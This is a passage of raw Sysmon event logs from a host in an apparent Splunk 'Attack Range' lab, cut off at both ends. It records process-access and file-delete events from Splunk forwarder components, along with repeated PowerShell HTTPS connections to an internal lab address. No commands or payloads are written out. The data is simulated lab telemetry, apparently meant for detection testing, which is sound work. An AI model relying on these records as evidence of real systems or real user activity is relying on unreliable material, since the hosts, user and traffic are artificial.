Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E7D-613A-4390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E7D-613A-4390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.284{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E7D-613A-4390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.269{B81B27B7-4E7D-613A-4390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=880E4FFB86ED3F1CF2765C2EAA2A6AD8,SHA256=54BA4175838E745DEFE96A194493395A3635A778897CBD5284059B57D270D5EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.131{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24A7A85C4FFFDFCF2BB48FB811838033,SHA256=08BE7868CA165897DEFBC5B96A39D02EFAE525813AD736AB11BA26568B35F3FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:14.498{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5991EBACD7F2DA81F79988389B73CF44,SHA256=B0FAF12D308B7CFB93789E64EF32705BAFC8EB27FBCB73B580C0AC1D4919B292,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:14.498{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FEB2632C7B0D4A7003B4D889FBE6C08E,SHA256=9C8F78EC505E449593807BDE849E83827D8BEAAF643FB93506D9E22D9ED9B6CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:14.152{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12FEB9EC8329044DC1867D33E42E4F7D,SHA256=B3C49E182AE5D5C4A7FA5E4A109D90040A7395C5FD84FE6EE7F83C803AFE2362,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:40.051{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56641-false10.0.1.12-8000- 23542300x800000000000000035084714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:15.170{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A47C1F0E2765DA4BD56D1C7148CF6A53,SHA256=883ECF67990D652D5B74E640DE4DFA4F45531DE1B340CE1A88AA5A6E0D5D3E0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:16.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79F9FB669C95DECA3AE16234BF71AB61,SHA256=02BB19BB9C965D4E49E3B94F3F6268549C63A8130E6C4EC033D5AD97CD10DEA7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:17.231{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F9DC304478F6B16EF0B4153D4413D849,SHA256=C64FC31E9D6AFFFC9C597C2EDE17D1DC45095E4E0CA81D3550B4045ED07A1D86,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:17.215{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C596248B0047AE7EE1E06CF095DD3061,SHA256=650381EA4F559F65448F117252644C34F31950F2C8E37CC0B985515199E0217D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:42.205{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56642-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:18.216{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CE6CEC6D48AA80F2D98E767ADE5491,SHA256=2856B08B04A6FDD36A8F1166780B6CEE41B4E2039CA0D15119FABBD2321769DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:19.248{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAA5B8385C4BA593F3E5B0EB1E5D1DF1,SHA256=D35F1DB8B664D2C8C77F7F951118D5837B4C8AAB7B33BEBFF2CC308E58505BD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:45.089{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56643-false10.0.1.12-8000- 23542300x800000000000000035084722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:20.267{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0455F10F8D7B4D532B31641EBD234F53,SHA256=FE1F8DDC81D4D516279696127B6702C502649EC953349D97D46DC2281EB2F56A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:21.312{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AC9962669DD35A1FB57C1E34C8265B3A,SHA256=BB11B9636B45C0D889EF6E4B8B0E8691AFC57FCF584A4D2822D0FE80D8BB383F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:21.281{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B173987E75EA2182D3085B5F0ACED8A,SHA256=ADCB358626906AC4AA3E255AD2E7899EC6232FA8B6A2BF4EF5E3C21492C95871,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:46.219{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56644-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:22.328{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3938E3B9B1047494B2C59E6BED5FE2C,SHA256=456BB290D8BBD61A6A0F9FC51A7FF010FF1D10CE2DD1BBB82E13CF83E09C7125,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:23.347{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6EABAB1F071A90A18E08BF17F1EC8EF,SHA256=00B3F9D3CF625501FE8CD9D0591431FDFDE913796C53E21891CF450C20F4ACD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:24.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70F7D6FDFFA16F105829989585F6938C,SHA256=4858A22EBBB2DE8C7BC99AD8B16209BD36403841F649F7084BB958E976980B98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:50.163{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56645-false10.0.1.12-8000- 23542300x800000000000000035084731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:25.380{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4B18AEF51FA2D28F01E1D665804167D,SHA256=BBE766FD8DE714ED03D914DD95C3CD318F64DD9B7CF0927864B7A400DC544338,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:25.227{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=75EFEF9C1FA4ED06933E9D96DD210AC0,SHA256=F28CB3ABC02EE521BDA232E251E6DAA48A412B8BE91806759BB65700B7FCC42D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:26.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82C0B1B20223559A373FFF13AC66347A,SHA256=5942DBDDFA53FC2D41EE0162BCB731443C441014D60C8924ACED20D4A624B1E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:27.409{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4A97B7D6069A02A1AD64E7F910DE701,SHA256=EEA8C1AE791CDAC6BF81D584949616859E8F1B78466440C44B8871FB2942BA0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:50.233{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56646-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035084753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.843{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E8C-613A-4690-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.841{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.841{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.841{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.841{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.841{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E8C-613A-4690-03000000C801}5256C:\Program 